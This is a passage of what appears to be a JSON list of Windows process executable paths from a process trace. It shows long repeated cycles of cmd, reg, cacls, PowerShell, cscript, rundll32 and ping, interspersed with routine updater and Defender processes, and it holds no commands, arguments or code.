indowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\AppHostRegistrationVerifier.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\